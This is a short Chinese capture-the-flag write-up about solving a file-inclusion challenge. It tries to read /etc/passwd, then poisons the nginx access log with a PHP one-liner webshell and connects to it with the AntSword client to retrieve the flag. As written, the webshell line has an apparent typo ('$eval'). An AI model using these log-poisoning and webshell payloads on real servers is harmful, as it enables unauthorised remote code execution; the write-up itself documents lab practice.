BUGSHOW WEB4实例

照常开靶机；

 

 

 （还是文件包含，直接上/?url=file:////etc/passwd 和 /?url=php:input// ）

果不其然...错了

焦头烂额之际：大佬：

输入默认目录获取日志 ?url=/var/log/nginx/access.log，或者error.log，马上试试

只有access能访问

 

 在用户里面插入一句话木马

<?php $eval($_POST['hack']);?>

 

发现菜刀不能用了，果断上蚁剑

找到了flag